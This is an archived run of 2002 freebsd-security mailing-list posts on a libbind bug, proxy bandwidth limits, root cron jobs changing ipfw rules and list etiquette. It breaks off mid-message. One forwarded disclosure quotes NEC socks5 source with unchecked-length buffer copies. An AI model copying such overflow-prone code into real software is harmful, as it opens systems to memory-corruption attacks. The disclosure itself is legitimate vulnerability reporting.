Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 18:24:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 28B7037B400 for ; Tue, 2 Jul 2002 18:24:24 -0700 (PDT) Received: from moek.pir.net (moek.pir.net [130.64.1.215]) by mx1.FreeBSD.org (Postfix) with ESMTP id B36A143E0A for ; Tue, 2 Jul 2002 18:24:23 -0700 (PDT) (envelope-from pir@pir.net) Received: from pir by moek.pir.net with local (Exim) id 17PYsY-0003Qz-00 for freebsd-security@FreeBSD.ORG; Tue, 02 Jul 2002 21:24:22 -0400 Date: Tue, 2 Jul 2002 21:24:22 -0400 From: Peter Radcliffe To: freebsd-security@FreeBSD.ORG Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Message-ID: <20020703012422.GC9314@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <200207030109.g6319Ufb008965@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.27i X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav probably said: > As far as I know, named itself is not vulnerable, but libbind contains > the bug, and software that uses libbind's gethost*() (nothing in the > base system does) is vulnerable. Does -STABLE's /usr/bin/dig, host, etc, not use libbind, then ? strings on the binary suggests otherwise. \pir -- pir pir-sig@pir.net pir-sig@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 18:43:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E8E7637B400 for ; Tue, 2 Jul 2002 18:43:32 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 728F143E0A for ; Tue, 2 Jul 2002 18:43:32 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 1CC3A534A; Wed, 3 Jul 2002 03:43:30 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: freebsd-security@freebsd.org Cc: freebsd-security@FreeBSD.ORG Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response References: <200207030109.g6319Ufb008965@apollo.backplane.com> <20020703012422.GC9314@pir.net> From: Dag-Erling Smorgrav Date: 03 Jul 2002 03:43:29 +0200 In-Reply-To: <20020703012422.GC9314@pir.net> Message-ID: Lines: 14 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Peter Radcliffe writes: > Dag-Erling Smorgrav probably said: > > As far as I know, named itself is not vulnerable, but libbind contains > > the bug, and software that uses libbind's gethost*() (nothing in the > > base system does) is vulnerable. > Does -STABLE's /usr/bin/dig, host, etc, not use libbind, then ? They don't use the parts of libbind that contain the bug. They use low-level functions that return raw DNS records rather than just host names or IP addresses. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 19: 8:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2A02437B400 for ; Tue, 2 Jul 2002 19:08:38 -0700 (PDT) Received: from gatotkaca.mweb.net.id (gatotkaca.mweb.net.id [202.53.234.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 697B643E09 for ; Tue, 2 Jul 2002 19:08:36 -0700 (PDT) (envelope-from ruspeni@mti.ee.itb.ac.id) Received: from asep (unknown [202.153.233.17]) by gatotkaca.mweb.net.id (Postfix) with SMTP id 084FC784B2 for ; Wed, 3 Jul 2002 09:07:39 +0700 (JAVT) (envelope-from ruspeni@mti.ee.itb.ac.id) Message-ID: <004301c22237$53670000$21020a0a@mti.ee.itb.ac.id> From: "Asep Ruspeni" To: References: Subject: limiting proxy access Date: Wed, 3 Jul 2002 09:14:12 +0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i am using freebsd as gateway for internet connection in my office. these are my configurations : - proxy (squid) using port 8080 - dhcp server and natd - ipfw for firewall i use netstat to monitor which computer accessing proxy. sometimes manually deny ip/tcp computer which consume much bandwidth than others using ipfw and restarting squid daemon. (eg. using download accelerator plus which support proxy could consume great amount bandwidth available) my question : is there any script i could use, to maintain bandwidth limitation so it will automatically stop/limit bandwidth consuming without restarting squid daemon. thank you in advance. best regards. -asep- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 19:21:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D0C1937B400 for ; Tue, 2 Jul 2002 19:21:47 -0700 (PDT) Received: from moek.pir.net (moek.pir.net [130.64.1.215]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7841943E31 for ; Tue, 2 Jul 2002 19:21:47 -0700 (PDT) (envelope-from pir@pir.net) Received: from pir by moek.pir.net with local (Exim) id 17PZm6-0003lz-00 for freebsd-security@freebsd.org; Tue, 02 Jul 2002 22:21:46 -0400 Date: Tue, 2 Jul 2002 22:21:46 -0400 From: Peter Radcliffe To: freebsd-security@freebsd.org Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Message-ID: <20020703022146.GE9314@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@freebsd.org References: <200207030109.g6319Ufb008965@apollo.backplane.com> <20020703012422.GC9314@pir.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.27i X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav probably said: > They don't use the parts of libbind that contain the bug. They use > low-level functions that return raw DNS records rather than just host > names or IP addresses. and since libbind.a is isn't installed as part of the base OS, just by the port, most people should be ok. Thanks, P. -- pir pir-sig@pir.net pir-sig@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 21:30:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4F3B937B400 for ; Tue, 2 Jul 2002 21:30:36 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7AFF843E3D for ; Tue, 2 Jul 2002 21:30:35 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id WAA28451; Tue, 2 Jul 2002 22:30:20 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020702222843.00cf1610@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 02 Jul 2002 22:30:15 -0600 To: Chris BeHanna , FreeBSD Security From: Brett Glass Subject: Re: security fixes In-Reply-To: <20020702191848.O13868-100000@topperwein.dyndns.org> References: <20020702230034.1316.qmail@web10104.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:25 PM 7/2/2002, Chris BeHanna wrote: > OK, then. Ante up, say, $7000 apiece to get two people working on >this full-time, and you might get 4.6.1 in six weeks. Nonsense. If there's a consensus that it should be done (and one is growing), then it will be done. Without delaying any releases scheduled for four months hence. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 23:50:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3B3C737B400 for ; Tue, 2 Jul 2002 23:50:39 -0700 (PDT) Received: from smtp.pekinnet.net (smtp.pk.gallatinriver.net [64.40.75.24]) by mx1.FreeBSD.org (Postfix) with ESMTP id B94A143E0A for ; Tue, 2 Jul 2002 23:50:38 -0700 (PDT) (envelope-from freebsdlists@elitists.org) Received: from [192.168.1.10] (unknown [64.40.88.202]) by smtp.pekinnet.net (Postfix) with ESMTP id A5EF16A209 for ; Wed, 3 Jul 2002 02:41:17 -0400 (EDT) User-Agent: Microsoft-Entourage/10.0.0.1309 Date: Wed, 03 Jul 2002 01:50:35 -0500 Subject: Re: Low-volume list From: "F. Even" To: Message-ID: Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org No...as has been suggested, take it to "chat" or "questions" or anyplace else. This is getting rather old. You in particular keep regurgitating the same crap that has been covered time and again. I don't object to the workarounds, etc. either being discussed...but can we leave it at that?! Your tirades about what you believe to be ethical or not belong on a different list. Nobody cares. We want straight security info and ways to deal w/ the problems at hand, and I would say about 50% of the list in the last couple of weeks has been anything but that (including this very reply). TAKE IT TO ANOTHER LIST NOW and let us get back ON TOPIC already!!!!! (...and now Brett's reply will be something along the lines of "this is on-topic, Theo was of course right, and the FreeBSD team is most unethical, and it is not my fault that I can't comprehend some of the straight-forward responses to most of my issues, and my refusal to accept the responses, blah, blah, blah, blah, blah, blah...and now I need to post about 10 other messages to this...but hopefully I will eventually realize it is futile and there are other people that might actually have a point for once, and maybe I can just once suck it up and realize I am in the wrong here and allow the list to be put back on topic and take the discussion which it being in and of itself a large discussion makes it off-topic, to a list that is more appropriate for a discussion). ENOUGH already. Get ON TOPIC! Rare posting posted by, Frank On 7/1/02 11:59 PM, "security-digest" wrote: > Date: Mon, 01 Jul 2002 21:11:38 -0600 > From: Brett Glass > Subject: Low-volume list > > This isn't the first time that people have asked for a low-volume FreeBSD > security list with announcements only. But discussions of security are > important, too, and there should be a place for them! So, perhaps this > list should be split into two: "security-announce" (moderated) and > "security" (unmoderated). > > - --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 1: 4:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 18EA937B400 for ; Wed, 3 Jul 2002 01:04:16 -0700 (PDT) Received: from crc-polska.com (main.crc-polska.com [62.148.92.235]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4919F43E31 for ; Wed, 3 Jul 2002 01:04:14 -0700 (PDT) (envelope-from sebastian.krolak@crc-polska.com) Received: from (IT1) [192.168.1.216] (helo=IT1) by crc-polska.com with esmtp (Exim 3.22 #1) for freebsd-security@FreeBSD.ORG id 17Pf01-0006QE-00; Wed, 03 Jul 2002 09:56:29 +0200 From: =?iso-8859-2?Q?Sebastian_Kr=F3lak?= To: Subject: subscribe Date: Wed, 3 Jul 2002 10:05:46 +0200 Message-ID: <000201c22268$6f7c3770$d801a8c0@kopernik.local> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0003_01C22279.33050770" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0003_01C22279.33050770 Content-Type: text/plain; charset="iso-8859-2" Content-Transfer-Encoding: quoted-printable =20 =20 Pozdrawiam Sebastian Kr=F3lak Administrator sieci CRC CommunicAID Sp. z o.o. tel. (22) 7162760 w. 121 fax (22) 7162767 kom. +48 609 023 393 Sebastian.Krolak@crc-polska.com http://www.crc-polska.com =20 =20 =20 ------=_NextPart_000_0003_01C22279.33050770 Content-Type: text/html; charset="iso-8859-2" Content-Transfer-Encoding: quoted-printable

 

 

Pozdrawiam
Sebastian Kr=F3lak

Administrator = sieci


CRC CommunicAID Sp. z o.o.
tel. (22) 7162760 w. = 121

fax (22) = 7162767
kom. +48 609 023 393<= /o:p>

 

 

------=_NextPart_000_0003_01C22279.33050770-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 1:53:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 94B1F37B400 for ; Wed, 3 Jul 2002 01:53:52 -0700 (PDT) Received: from south.nanolink.com (south.nanolink.com [217.75.134.10]) by mx1.FreeBSD.org (Postfix) with SMTP id 1122143E52 for ; Wed, 3 Jul 2002 01:53:50 -0700 (PDT) (envelope-from roam@ringlet.net) Received: (qmail 5356 invoked by uid 85); 3 Jul 2002 09:06:08 -0000 Received: from unknown (HELO straylight.ringlet.net) (212.116.140.125) by south.nanolink.com with SMTP; 3 Jul 2002 09:06:05 -0000 Received: (qmail 21742 invoked by uid 1000); 3 Jul 2002 08:52:19 -0000 Date: Wed, 3 Jul 2002 11:52:19 +0300 From: Peter Pentchev To: Kim Okasawa Cc: freebsd-security@FreeBSD.ORG Subject: Re: Any security issues with root's cron job? Message-ID: <20020703085219.GC384@straylight.oblivion.bg> Mail-Followup-To: Kim Okasawa , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="WYTEVAkct0FjGQmd" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.1i X-Virus-Scanned: by Nik's Monitoring Daemon (AMaViS perl-11d ) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --WYTEVAkct0FjGQmd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jul 03, 2002 at 09:59:15AM +0900, Kim Okasawa wrote: >=20 > Dear all, >=20 > I want to set up a crob job to run a script (Perl or shell). The script= =20 > will be read/write/exec by root only (i.e. 700 or -rwx------). It will r= un=20 > /sbin/ipfw periodically to change rules according to need. >=20 > Can anyone think of any potential security risks to such practice? Any= =20 > suggestions and comments are greatly appreciated. Thank you! I can see no problem with that as far as you described it; any potential problems would crawl out of the 'according to need' part. You'd better be damn sure that no one but specially-authorized-sysadmin-processes can indicate 'need'. Other than that, no, there is no problem with root cron jobs per se, as long as you are careful :) G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 This sentence no verb. --WYTEVAkct0FjGQmd Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9IrtD7Ri2jRYZRVMRAscIAKDEP+67h/qtHSYkTfgq1uZKrjXBvwCgiYey P7Khp20hbpWY2FVO1ppjPX4= =zeFj -----END PGP SIGNATURE----- --WYTEVAkct0FjGQmd-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 7:53:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A29A937B400 for ; Wed, 3 Jul 2002 07:53:27 -0700 (PDT) Received: from r4k.net (r4k.net [212.26.197.210]) by mx1.FreeBSD.org (Postfix) with ESMTP id 15FC843E09 for ; Wed, 3 Jul 2002 07:53:27 -0700 (PDT) (envelope-from _@shell.r4k.net) Received: from shell.r4k.net (localhost [127.0.0.1]) by r4k.net (Postfix) with ESMTP id C573223031; Wed, 3 Jul 2002 16:53:25 +0200 (CEST) Received: (from _@localhost) by shell.r4k.net (8.12.4/8.12.2/Submit) id g63ErJ5s036592; Wed, 3 Jul 2002 16:53:19 +0200 (CEST) Date: Wed, 3 Jul 2002 16:53:19 +0200 From: Stephanie Wehner <_@r4k.net> To: Peter Pentchev Cc: freebsd-security@FreeBSD.ORG Subject: Re: Any security issues with root's cron job? Message-ID: <20020703145319.GB14710@r4k.net> References: <20020703085219.GC384@straylight.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020703085219.GC384@straylight.oblivion.bg> User-Agent: Mutt/1.3.25i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Peter, > > I want to set up a crob job to run a script (Perl or shell). The script > > will be read/write/exec by root only (i.e. 700 or -rwx------). It will run > > /sbin/ipfw periodically to change rules according to need. > > > > Can anyone think of any potential security risks to such practice? Any > > suggestions and comments are greatly appreciated. Thank you! > > I can see no problem with that as far as you described it; any potential > problems would crawl out of the 'according to need' part. You'd better > be damn sure that no one but specially-authorized-sysadmin-processes can > indicate 'need'. > > Other than that, no, there is no problem with root cron jobs per se, as > long as you are careful :) hmja, however in this case I'd also be interested in how this system obtains its timing information. eg if the ipfw rules are set by a cronjob and the machine is remotely updated from an ntp server for example, anyone controlling the ntp server could in effect toggle your firewall rules. I guess this is also somewhat contained in this 'according to need' part. bye, Stephanie --<> _@r4k.net <>------------------<> FreeBSD <>------------------- #3 - Anime Law of Sonic Amplification, First Law of Anime Acoustics In space, loud sounds, like explosions, are even louder because there is no air to get in the way. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 8:18: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D677D37B400 for ; Wed, 3 Jul 2002 08:18:04 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0B3A043E09 for ; Wed, 3 Jul 2002 08:18:03 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id JAA03329; Wed, 3 Jul 2002 09:17:22 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020703091546.02377ac0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 03 Jul 2002 09:17:14 -0600 To: "F. Even" , From: Brett Glass Subject: Re: Low-volume list In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:50 AM 7/3/2002, F. Even wrote: >No...as has been suggested, take it to "chat" or "questions" or anyplace >else. This is getting rather old. You in particular keep regurgitating the >same crap that has been covered time and again.... > >[Remainder of long flame deleted] You're off-topic. ;-) --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 8:44:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 16DAE37B401 for ; Wed, 3 Jul 2002 08:44:44 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 407E643E31 for ; Wed, 3 Jul 2002 08:44:43 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.4) with ESMTP id g63FiZmW023125 for ; Wed, 3 Jul 2002 11:44:36 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020703114631.04f94d20@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 03 Jul 2002 11:48:07 -0400 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: NEC's socks5 (Re: Foundstone Advisory - Buffer Overflow in AnalogX Proxy (fwd)) Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"; format=flowed Content-Transfer-Encoding: quoted-printable X-Virus-Scanned: By Sentex Communications (obsidian/20020220) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Has anyone run the socks5 daemon below as a chrooted and non privileged=20 user ? It binds to 1080, is there any reason it needs to even run as root ? ---Mike >X-Virus-Scanned: By Sentex Communications (avscan2/20020220) > >Dear Dave Ahmad, > >Nearly same bugs exist in reference socks5 implementation by NEC. There >are few different overflows, all look not exploitable in socks5v1.0r11, >at least on majority of platforms due to specific data layout, but may >be exploitable in earlier versions or in derived software. Examples: > >1. in SOCKS5 User-Name parsing: > >proxy.c: > >static int GetString(S5IOHandle fd, char *buf, double *timerm) { > u_char len; > > buf[0] =3D '\0'; > if (S5IORecv(fd, NULL, (char *)&len, 1, 0, UPWD_IOFLAGS, timerm) !=3D= =20 > 1) return -1; > if (len =3D=3D 0) return 0; > > if (S5IORecv(fd, NULL, buf, len, 0, UPWD_IOFLAGS, timerm) !=3D len)=20 > return -1; > buf[len] =3D '\0'; > return len; >} > >problem is that target username buffer is 128 bytes. > >2. In SOCKS4 username parsing: > >proxy.c: > >static int HandleS4Connection(S5LinkInfo *pri, S5IOInfo *iio, list *auths,= =20 >double *timerm) { >... > char buf[256+256+8], >... > > for (tmp =3D buf, *tmp =3D '\0'; tmp < buf+sizeof(buf)-1; *++tmp =3D= '\0') { > if (S5IORecv(iio->fd, iio, tmp, 1, 0, PROXY_IOFLAGS, timerm) !=3D= 1) { > S5LogUpdate(S5LogDefaultHandle, S5_LOG_DEBUG(0), 0, "Socks4:= =20 > Read failed: %m"); > return EXIT_ERR; > } > > if (*tmp =3D=3D '\0') break; > } > > S5LogUpdate(S5LogDefaultHandle, S5_LOG_DEBUG(10), 0, "Socks4: Read=20 > user: %s", buf); > > strcpy(pri->srcUser, buf); > >pri->srcUser is 128 bytes... > >3. in reading hostname > >struct sockaddr_name { > unsigned short sn_family; > unsigned short sn_port; > char sn_name[255]; >}; > > >protocol.c: > memcpy(result->sn.sn_name, buf+RP_HOSTOFF+1,=20 > (u_char)buf[RP_HOSTOFF]); > memcpy(&result->sn.sn_port, buf+RP_HOSTOFF+1+buf[RP_HOSTOFF],= =20 > sizeof(u_short)); > result->sn.sn_name[(int)(u_char)buf[RP_HOSTOFF]] =3D '\0'; > >(off-by-one vuln). > > >I've got no response from authors. > > >-- >~/ZARAZA >=CE=F1=EE=E1=F3=FE =EF=F0=EE=E1=EB=E5=EC=F3 =F1=EE=F1=F2=E0=E2=EB=FF=E5=F2= =E0=EB=EA=EE=E3=EE=EB=E8=E7=EC. (=CB=E5=EC) -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 9:11:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4493F37B400 for ; Wed, 3 Jul 2002 09:11:36 -0700 (PDT) Received: from portal.eltex.ru (eltex-gw2.nw.ru [195.19.203.86]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4DF2243E09 for ; Wed, 3 Jul 2002 09:11:35 -0700 (PDT) (envelope-from ark@eltex.ru) Received: (from root@localhost) by portal.eltex.ru (8.12.3/8.11.3) id g63GBWrF075506; Wed, 3 Jul 2002 20:11:32 +0400 (MSD) (envelope-from ark@eltex.ru) Received: from yaksha.eltex.ru (root@yaksha.eltex.ru [195.19.198.2]) by portal.eltex.ru (8.12.3/8.11.3av) with SMTP id g63GBNDf075489; Wed, 3 Jul 2002 20:11:23 +0400 (MSD) (envelope-from ark@eltex.ru) From: ark@eltex.ru Received: by yaksha.eltex.ru (ssmtp TIS-1.1alpha, 17 Jan 2002); Wed, 3 Jul 2002 20:01:28 +0400 Received: from undisclosed-intranet-sender id smtpdbZ8705; Wed Jul 3 20:01:19 2002 Date: Wed, 3 Jul 2002 20:02:34 +0400 Message-Id: <200207031602.UAA03991@paranoid.eltex.ru> In-Reply-To: <5.1.0.14.0.20020703114631.04f94d20@marble.sentex.ca> from "Mike Tancsa " Organization: "Klingon Imperial Intelligence Service" Subject: Re: Fwd: NEC's socks5 (Re: Foundstone Advisory - Buffer Overflow in AnalogX Pro To: mike@sentex.net Cc: security@freebsd.org X-Virus-Scanned: by Eltex TC Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- I think it is because of icmp extentions (can't remember if remote socket is allowed to bind privileged port but that may be a reason too) Mike Tancsa said : > Has anyone run the socks5 daemon below as a chrooted and non privileged > user ? It binds to 1080, is there any reason it needs to even run as root ? _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.1i iQCVAwUBPSMgGaH/mIJW9LeBAQE4qgP6AwE9zy+duCZyf6zQa/EwyXycr0OxGGgv OhZSCXSgpXmCCSwbEhjSaimLVgcn9KYCdWAkaHAS51euqwh/l43bsXItkhiSiOmy B7P1t7iA7HVyhEcGksZ3ucEvSSXGf1ftnORbypPiNd8wdNp6KWPUCGEWfAgx0/l9 vMBEwXs3KrA= =7QLi -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 10:23:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4440937B400 for ; Wed, 3 Jul 2002 10:23:46 -0700 (PDT) Received: from malkavian.org (malkavian.org [206.136.132.23]) by mx1.FreeBSD.org (Postfix) with ESMTP id AC48543E3B for ; Wed, 3 Jul 2002 10:23:45 -0700 (PDT) (envelope-from rbw@myplace.org) Received: from malkavian.org (rbw@localhost [127.0.0.1]) by malkavian.org (8.12.3/8.12.3) with ESMTP id g63HNc9E005410; Wed, 3 Jul 2002 13:23:38 -0400 (EDT) (envelope-from rbw@myplace.org) Received: (from rbw@localhost) by malkavian.org (8.12.3/8.12.3/Submit) id g63HNbaa005409; Wed, 3 Jul 2002 10:23:37 -0700 (MST) X-Authentication-Warning: malkavian.org: rbw set sender to rbw@myplace.org using -f Date: Wed, 3 Jul 2002 